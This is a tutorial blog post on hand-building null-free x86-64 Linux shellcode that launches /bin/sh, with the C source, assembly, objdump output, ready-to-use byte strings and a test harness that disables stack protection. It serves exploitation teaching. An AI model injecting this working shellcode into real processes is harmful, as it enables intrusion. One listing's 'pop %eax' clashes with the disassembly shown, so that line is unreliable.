Making of a shellcode for a 64-bit Linux.

Spoiler: A quick return to basics with an article that takes us to the basics of software exploitation: making a shellcode on a 64-bit archi.

The other day, while teaching a class at INSA, I presented students with a method for making their own shellcode.

For those unfamiliar with the term, it is a string of characters containing binary code that can be executed on a machine. It must be different depending on the architecture on which it will run, but also on the OS for which it is intended.

My transparencies then showed as an example the creation of a shellcode on a Linux, for a 32-bit architecture. The binary executed was the most classic of shellcode: opening a command line.

And obviously, I was asked the following question: “What about 64bits?”

Here is a small article to answer the question, it details the creation of a shellcode allowing to launch /bin/sh if you have a Linux and a 64 bits processor.

geralt @ pixabay

Code C

If we were dead good, we could of course write the shellcode directly in machine code … But few people speak opcode fluently … Even assembly (a translation of opcodes a second more readable) is a language which is not very widespread …

Tradition has it, therefore, that when we write a shellcode, we start with a code in C, which we will translate into assembler, then into machine code.

Writing code in C is optional, but has two advantages:

kuszapro @ pixabay

Target

The following program will launch a shell, through the use of execve. It will serve as our target: it represents exactly what we want our shellcode to do.

#include <stdio.h>
#include <unistd.h> 
#include <stdlib.h>

void main() {
    char *name[2];
    
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    exit(0);
}

When calling execve (), the system will replace the current process with the one corresponding to the execution of /bin/sh. If this operation is successful, the instruction flow is interrupted to continue in this new process. If this fails, execution will continue with the call exit(0).

In a main like ours, the call toexit(0)is useless since ifexecve failed, the program would terminate naturally anyway.

But the purpose of a shellcode is to be injected into the memory of an attacked process to be executed (i.e. by buffer overflow but not only). As we have no certainty either on the success of execve(), or on the contents of memory after our shellcode, we prefer to force a quiet termination of the process by a call to exit() rather than to do so. let anything do it anyhow.

If we wanted to be cleaner, we would have to do an exit(1) but as we generally do not want to attract the attention of monitoring by error return codes (with a 1), we lie to it saying that everything is fine (with a 0).

The compilation

We compile with gcc, then we run the binary and we observe that we have indeed opened a shell.

arsouyes@VBox:~/Documents$ gcc shellcode.c -o shellcode
arsouyes@VBox:~/Documents$ ./shellcode 
$ 

If you want to observe the disassembled code with gdb, I advise you to compile with the following options:

Go through the assembly

Now that we know where we are going, we will write the assembly code corresponding to the C code.

We come up against two constraints:

The /bin/sh string

It is not possible to know in advance the address of the string /bin/sh. We will therefore have to cunning to recover it.

Interestingly, since we are on a 64-bit architecture, it is possible to directly store the string /bin/sh, in its hexadecimal form, in a register. /bin/sh in hexadecimal gives:2f.62.69.6e.2f.73.68. As we are on a little-endian architecture, this will give 0x68732f6e69622f. Finally, since this is a character string, we will add the empty character (0x00) at the end, so we will store the string0x0068732f6e69622f in a register.

We can then pusher this register on the stack. The string address will then be the stack pointer address.

Execve

The second constraint is the obligation to free ourselves from any external libraries, because we are not sure that they are present. We will therefore have to go to the source of the calls, in our case to execve andexit.

The execve function is quite a special function. It requires asking the operating system to perform process control tasks. As our user process is not capable of making these kinds of requests, we have to make system calls.

A little search in the system call table of the Linux kernel tells us that execve matches to system call number 59, i.e. 0x3b in hexadecimal.

By convention when calling a system call, on Linux, the parameters are passed via the registers in the following order: rdi,rsi, rdx,rcx, r8,r9. Likewise, by convention, the system call number must be in the rax registry. The system call is then made via the assembly instruction syscall. So we need to put the address of /bin/sh in therdi register, the address of the address of /bin/sh in thersi register, and 0 in the rdx register. We also need to have0x3b in the rax registry.

Which translates into assembly by:

    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8      
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall     

Exit

As before, exit is a system call. It therefore works in the same way as execve, i.e. its only parameter will be in therdi register, and its number (60, i.e. 0x3c), must be in the register rax.

Its assembly code will therefore be:

    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall    

If you want to use gdb to disassemble exit and observe its code, you will find that this is tedious; exit calls_run_exit_handlers which itself does a lot of things before calling _exit, which ends up doing the syscall by putting 0x3c in therax register.

Final code

Now that we have all the information to write our code, we can concatenate it together and write the code in assembly language. To facilitate, we add the few decorations that will allow us to have an autonomous asm code:

.section .text
.globl _start
_start:
    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8                    
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall     

We convert to object code with as, then we generate an executable file withld.

Since we are not using an external library, ld will just do some “decoration”, that is, the header, the entry point, and not much more …

arsouyes@VBox:~/Documents$ as -o asm.o asm.s
arsouyes@VBox:~/Documents$ ld -o asm asm.o
arsouyes@VBox:~/Documents$ ./asm
$ 

Opcode

Now that we have our assembly code, we can finally switch to machine code. Each instruction must be translated into machine code, a sequence of 0 and1 understandable by the processor. You can use the INTEL documentation for this.

geralt @ pixabay

But as a good computer scientist is a lazy computer scientist, we will use objdump, which will do it for us …

objdump is a command line program for displaying various information about object files. The option we are interested in is -d, which allows disassembly. Each instruction is split into a line, which begins with its address, then its hexadecimal version, and finally, its assembly code.

arsouyes@VBox:~/Documents$ objdump -d asm.o
asm.o:     format de fichier elf64-x86-64
Déassemblage de la section .text :
0000000000000000 <_start>:
 0: 48 c7 c0 3b 00 00 00 mov    $0x3b,%rax
 7: 48 c7 c2 00 00 00 00 mov    $0x0,%rdx
 e: 49 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%r8
15: 73 68 00 
18: 41 50                push   %r8
1a: 48 89 e7             mov    %rsp,%rdi
1d: 52                   push   %rdx
1e: 57                   push   %rdi
1f: 48 89 e6             mov    %rsp,%rsi
22: 0f 05                syscall 
24: 48 c7 c0 3c 00 00 00 mov    $0x3c,%rax
2b: 48 c7 c7 00 00 00 00 mov    $0x0,%rdi
32: 0f 05                syscall 

We will get the hexadecimal. This is our shellcode.

\x48\xc7\xc0\x3b\x00\x00\x00\x48
\xc7\xc2\x00\x00\x00\x00\x49\xb8
\x2f\x62\x69\x6e\x2f\x73\x68\x00
\x41\x50\x48\x89\xe7\x52\x57\x48
\x89\xe6\x0f\x05\x48\xc7\xc0\x3c
\x00\x00\x00\x48\xc7\xc7\x00\x00
\x00\x00\x0f\x05

We can then test our shellcode. For that, we will use a small C code. By declaring a function pointer and giving it as value the address of the shellcode, we will be able to execute it:

#include<stdio.h>
#include<string.h>

int main(int argc, char **argv) {

    unsigned char code[] =
     "\x48\xc7\xc0\x3b\x00\x00\x00\x48"
     "\xc7\xc2\x00\x00\x00\x00\x49\xb8"
     "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
     "\x41\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
     "\x00\x00\x00\x48\xc7\xc7\x00\x00"
     "\x00\x00\x0f\x05";
    
    int (*ret)() = (int(*)())code;

    ret();
}

To compile, you must use the following options:

arsouyes@VBox:~/Documents$ gcc testop.c -o testop -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop 
$ exit

You may also need to install the execstack package.

And There you go ! Our shellcode works!

Remove 0x00

Our shellcode is still far from ready for real-world use. The presence of 0x00 in it can cause it to be truncated when copying with a function like strcpy

An alternative must therefore be found for each problematic instruction.

A mov instruction containing opcodes with 0’s can be replaced by apush, followed by a pop.

In our case :

mov $0x3b,%rax et mov $0x3c,%rax are problematic and can be replaced by

    push $0x3b
    pop %rax

and

    push $0x3c
    pop %rax

An instruction putting 0x00 in a register can be replaced by an xor of the register on itself.

We therefore perform a first replacement:

;   mov    $0x0,%rdx
    xor    %rdx,%rdx

And a second:

;   mov    $0x0,%rdi
    xor    %rdi,%rdi

Finally, our string itself ends with a \0. To avoid this, we will use the string //bin/sh, which we will put in the r8 register, then we will make an 8-bit shift, which will therefore put a 0 at the end of the string .

In our case :

movabs $0x0068732f6e69622f,%r8 will be replaced by

;   movabs $0x0068732f6e69622f,%r8
    movabs $0x68732f6e69622f2f,%r8
    shr    $0x8,               %r8

Our final assembly code will therefore be:

.section .text
.globl _start
_start:
    push $0x3b
    pop %eax
    xor %rdx,%rdx
    movabs $0x68732f6e69622f2f,%r8    
    shr $0x8, %r8                    
    push %r8
    mov %rsp, %rdi
    push %rdx
    push %rdi
    mov %rsp, %rsi
    syscall
    push $0x3c
    pop %eax
    xor %rdi,%rdi
    syscall     

Using objdump, we check that there is no more 0 left:

arsouyes@VBox:~/Documents$ objdump -d asm2.o
asm2.o:     format de fichier elf64-x86-64
Déassemblage de la section .text :
0000000000000000 <_start>:
 0: 6a 3b                pushq  $0x3b
 2: 58                   pop    %rax
 3: 48 31 d2             xor    %rdx,%rdx
 6: 49 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%r8
 d: 2f 73 68 
10: 49 c1 e8 08          shr    $0x8,%r8
14: 41 50                push   %r8
16: 48 89 e7             mov    %rsp,%rdi
19: 52                   push   %rdx
1a: 57                   push   %rdi
1b: 48 89 e6             mov    %rsp,%rsi
1e: 0f 05                syscall 
20: 6a 3c                pushq  $0x3c
22: 58                   pop    %rax
23: 48 31 ff             xor    %rdi,%rdi
26: 0f 05                syscall

We therefore have a shellcode from which we have removed the 0. We can test it in the same way as before, by inserting it in a C code.

#include<stdio.h>
#include<string.h>

int main(int argc, char **argv) {
    
    unsigned char code[] =
     "\x6a\x3b\x58\x48\x31\xd2\x49"
     "\xb8\x2f\x2f\x62\x69\x6e\x2f"
     "\x73\x68\x49\xc1\xe8\x08\x41"
     "\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x6a\x3c\x58"
     "\x48\x31\xff\x0f\x05";
    
    int (*ret)() = (int(*)())code;

    ret();
}

By compiling and running:

arsouyes@VBox:~/Documents$ gcc testop2.c -o testop2 -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop2 
$ exit

And after ?

You can use this method to create your own shellcodes. It can of course be adapted to a 32-bit Linux, or even to Windows. And reuse the principle to do more than just launch a shell …